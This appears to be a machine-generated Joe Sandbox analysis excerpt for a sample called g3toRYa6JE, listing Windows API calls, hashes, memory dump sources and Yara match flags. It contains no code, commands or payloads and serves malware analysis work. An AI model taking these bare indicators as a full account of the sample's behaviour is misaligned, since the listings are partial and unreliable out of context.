                                                                                                                                                                                                                              • Instruction ID: 5d769fd1b82dd77ab6916f7b6a3082310c88d3d282abdd348edd03e1f2170978
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51E770C00784DAD711AFA4EC497BD7B78FF2A302F045225E805A6163FB789B86C769
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 00782392
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 007823A7
                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 007823AE
                                                                                                                                                                                                                              • CreateSolidBrush.GDI32(00646464), ref: 007823C1
                                                                                                                                                                                                                              • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 007823E0
                                                                                                                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00782401
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0078240C
                                                                                                                                                                                                                              • MulDiv.KERNEL32(00000008,00000000), ref: 00782415
                                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00782439
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 007824C4
                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007824DC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1529870607-0
                                                                                                                                                                                                                              • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                              • Instruction ID: 0cea225da9494a4d355d4d0b07d8b768ab0862bd6c6ca1c9aed1a53193cf7b39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7671ED72900218AFDB229F64DD89FAEBBBCEF49711F0042A5F509E6155DA74AF80CF14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                              • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                              • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                              • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,007BBCE4,?,00000000), ref: 007BBA5E
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,007BBCE4,?,00000000), ref: 007BBA87
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,007BBCE4,?,00000000), ref: 007BBA9C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                              • Instruction ID: 527939d345f17c5473debd34aa2c0798fe69184d5bf7e109307ec36c00094561
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3217F22E04105EAD7348F65D941BE773A6EB94F60B56C464ED0AD7110FBB6DE40C390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2287132625-0
                                                                                                                                                                                                                              • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                              • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2190
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B219D
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 007BBCA5
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 007BBD00
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 007BBD0F
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,007B0A0C,00000040,?,007B0B2C,00000055,00000000,?,?,00000055,00000000), ref: 007BBD57
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,007B0A8C,00000040), ref: 007BBD76
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2287132625-0
                                                                                                                                                                                                                              • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                              • Instruction ID: 14ffcbf1b272060a0b3bb455fbb7687bca6a57eb6d741190523ee2ec23b5f9d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8516F71A00209EBEB20DFA5DC45BFE7BB8EF05700F144569FD04E7251EBB99A448BA1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: <{$<{
                                                                                                                                                                                                                              • API String ID: 0-2500981893
                                                                                                                                                                                                                              • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                              • Instruction ID: 5b1a95952818d182fe1b731636db598cdb61fa942c0fbe61271071c344946700
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1023C71E01219DFDF14CFA9C8806AEB7F1EF89314F25826AE919E7341D735A941CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2444527052-0
                                                                                                                                                                                                                              • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                              • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007B0A13,?,?,?,?,007B046A,?,00000004), ref: 007BB343
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 007BB3D3
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 007BB3E1
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,007B0A13,00000000,007B0B33), ref: 007BB484
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2444527052-0
                                                                                                                                                                                                                              • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                              • Instruction ID: 24c006eec5ef1ce71de512830f8765001b18f8aaa32701028f4fb510db3f2cca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E61B171A00606EAD725AF65CC46BFA77A8FF45710F14443AFD15DB182EBB8E940C7A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2834031935-0
                                                                                                                                                                                                                              • Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                              • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                              • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0078DACD), ref: 007AA722
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0078DACD), ref: 007AA72C
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0078DACD), ref: 007AA739
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                              • Instruction ID: 6394a6c3601cf6625834296f911676593f278cb2a3f63c56578ea70d84176863
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A31D37490121CABCB21DF24D988B8DBBB8BF49710F5042EAE40CA7251E7349F858F45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0042FE89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                              • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,007B008C,00000000,00457970,0000000C,007B01E3,00000000,00000002,00000000), ref: 007B00D7
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,007B008C,00000000,00457970,0000000C,007B01E3,00000000,00000002,00000000), ref: 007B00DE
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 007B00F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                              • Instruction ID: 9e8caf3697bac3bf2c71281bfec7fa7b045c63dc18b327e689911e8572aecc84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E0B635400648EBCF116F64DD0DB9A7B69FB45B52F008064FA059B121CB3ADE42CA84
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction ID: 1050865b8f551beb30e40799f8e93d2cdd75059be690525d97bedd8af62775e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83318AB6900609CFDB10DF99C884AAEBBF9FF08324F25404AD841A7311D775EA49CBA4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                              • API String ID: 0-2043925204
                                                                                                                                                                                                                              • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                              • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                              • API String ID: 0-2043925204
                                                                                                                                                                                                                              • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                              • Instruction ID: 62b07c26dbd9a1b18b59e748e1cc1652f2add47c5faa7a96799e63084cf91d9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83412672600218AECB209FB9CC4DEFB7B7CEB84710F1046A9F905D7180EA359D41CB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
